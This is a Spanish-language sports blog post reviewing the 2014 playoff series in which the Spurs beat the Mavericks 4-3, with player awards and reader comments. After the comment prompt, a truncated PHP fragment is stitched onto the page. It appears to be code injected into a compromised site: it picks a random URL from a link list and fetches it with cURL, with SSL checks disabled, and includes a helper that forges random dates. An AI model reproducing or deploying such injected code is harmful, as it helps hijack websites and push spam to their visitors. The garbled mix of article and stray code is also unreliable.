PO 2014: Resumen San Antonio Spurs 4 – Dallas Mavericks 3

06 de May de 2014 por rumbero

¡Qué poco suelen defraudar los duelos tejanos y qué cortos se nos hacen! Y eso que comentábamos al inicio de la serie que los Spurs habían barrido a los Mavs durante la regular con un claro 4-0 y que partían como claros favoritos. Pero el tópico de que las cosas cambian en PO se ha hecho más cierto que nunca y estos dos clásicos nos han regalado un duelo casi a la altura de esas míticas semifinales de conferencia del 2006.

Los Mavs son la clara muestra de lo duro que es el oeste al forzar un séptimo partido a unos Spurs que se habían paseado bastante durante toda la regular. Advertíamos en el análisis previo que las defensas decantarían la eliminatoria y así ha sido en gran medida. Exceptuando el Game 5, Dallas ganó todos aquellos partidos en los que sobrepasó los 100 puntos y los Spurs tuvieron que sacar a pasear su versión más nasty para que esa no fuera la tónica general de la serie.

Sabíamos que Dallas es un gran equipo ofensivamente hablando (2º mejor ataque de la liga durante la RS) pero además Carlisle le dio una vuelta de tuerca más convirtiéndolo en imparable en muchos momentos incluso para un tipo como Popovich que sabe bastante de que va esto. Y no sólo eso, sino que un equipo que venía defendiendo bastante mal fue también capaz de enredar un ataque tan trabajado como el de San Antonio. Sólo la infinidad de recursos y la calidad de estos últimos les ha permitido pasar una eliminatoria en la que no estuvieron cómodos en ningún momento. 

Algunos se acordarán del primer partido en el que Dallas llegó a dominar por 10 puntos a falta de poco y en el que un Tim Duncan con la rodilla magullada tuvo que acudir al rescate. Otros recordarán que a la hora de la verdad los Spurs sacaron el rodillo para cerrar un séptimo partido a vida o muerte. En cualquier caso ambos equipos nos han regalado un lujo de primera ronda lleno de momentazos que deja en el camino a unos Mavs que volverán el año que viene para dar más guerra (con un par de retoques gentileza de Mark Cuban) y unos Spurs candidatos que siempre están a punto para cualquier tipo de batalla.

PREMIOS

MVP: ¿Qué difícil es dar este premio! Como suele pasar con los Spurs se hace casi imposible elegir a un único ganador, así que (¡oh sorpresa!) premio para el Big Three immortal. En el primer partido fue Tim Duncan (17.3 ppp – 8.4 rpp – 1.9 tpp) el que salvó los muebles, en el cuarto Manu Ginobili el que desatascó al equipo (17.7 ppp – 3.7 rpp – 4.6 app – 2.3 rpp) y en el último Tony Parker (19.9 ppp – 4.7 app) el que les dió la estocada definitiva a Dallas.

Sorpresa: Un DeJuan Blair con muchas ganas de reivindicarse ante Popovich estuvo a punto de ser un factor determinante en la eliminatoria pero ese exceso de motivación le tuvo por momentos más pendiente de pegar un buen palo que de defender y le costó además perderse un partido. Apuntamos también el nombre de Devin Harris (11.4 ppp – 3.9 appp) que le robó bastantes minutos a Calderón gracias a buenas actuaciones que nos recordaron por momentos a ese jugador de antaño . Por parte de los Spurs, destacar la sólida serie de Tiago Splitter (10.7 ppp – 9.0 rppp) al que siempre se pone en duda pero que ha sido capaz de subir sus números de temporada regular y ser decisivo en el Game 5.

Decepción: Marco Belinelli ha estado muy discretito. El flamante ganador del concurso de triples sólo ha convertido 4 en toda la serie y se ha quedado muy lejos de promediar los 11.4 ppp de RS. A punto ha estado Danny Green de llevarse el premio pero sus dos últimos partidos le salvan de tal honor. Capaz de lo mejor y lo peor a los Spurs les conviene su versión más regular.

Esfuerzo en vano: Hay que destacar la gran serie de Monta Ellis (20.4 ppp – 2.9 app) que ha sido un quebradero de cabeza continuo para San Antonio asumiendo además muchos tiros importantes. Dirk Nowitzki (19.1 ppp- 8.0 rpp) es de los que no se esconden nunca pero lo cierto es que ha parecido estar algo cansado. Nos hemos quedado sin ver alguna de esas actuaciones monstruosas con la que nos tiene acostumbrados, pero tal cantidad de calidad en sangre sigue haciendo de él un jugador determinante.

Comenta

5 comentarios a esta entrada

  1. Lucho dice:
    #1

    Puede influir mi nacionalismo pero para mi Manu fue el MVP

      Citar

  2. Nacho dice:
    #2

    Lucho:
    Puede influir mi nacionalismo pero para mi Manu fue el MVP

    Puedo estar de acuerdo, y puedo discrepar. ¡Esto es un sin vivir!
    Ese es el problema de los Spurs, tienen tres tíos (a los que a la chita callando se le suma también Leonard) que te deciden partidos en minutos y no son tipos que estén todo el partido amasando protagonismo tipo Kobe, LeBron, Durant…
    Para mi forma de entender este deporte soy más de estos tipos. (Aunque siendo Petrovic mi jugador preferido vuelvo a contradecirme)

      Citar

  3. rumbero dice:
    #3

    Lucho:
    Puede influir mi nacionalismo pero para mi Manu fue el MVP

    Si tuviera que quedarme sólo con uno seguramente también escogeria a Manu por ser el que ha tenido las ideas más claras cuando más atascados estaban los Spurs. Pero me parecía injusto dárselo sólo a él. Como dice Nacho, este Big Three se las ingenía casi sempre para repartirse las cuotas de protagonismo y puede venir otro a decir que el MVP ha sido Parker y no le faltaría razón

      Citar

  4. Vader dice:
    #4

    A mi Leonard me tiene el corazón robado, que jugadorazo… (Los Pacers se deben tirar de los pelos de la cabeza al pensar que lo cambiaron por George Hill).

      Citar

  5. Nacho dice:
    #5

    Vader:
    A mi Leonard me tiene el corazón robado, que jugadorazo… (Los Pacers se deben tirar de los pelos de la cabeza al pensar que lo cambiaron por George Hill).

    Lo de los Pacers puede ser y no. Hay que tener en cuenta que Pop saca jugadores que en otros equipos estarían viéndolas venir. Puede que Leonard no sea uno de ellos, ¿pero jugaría por George?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>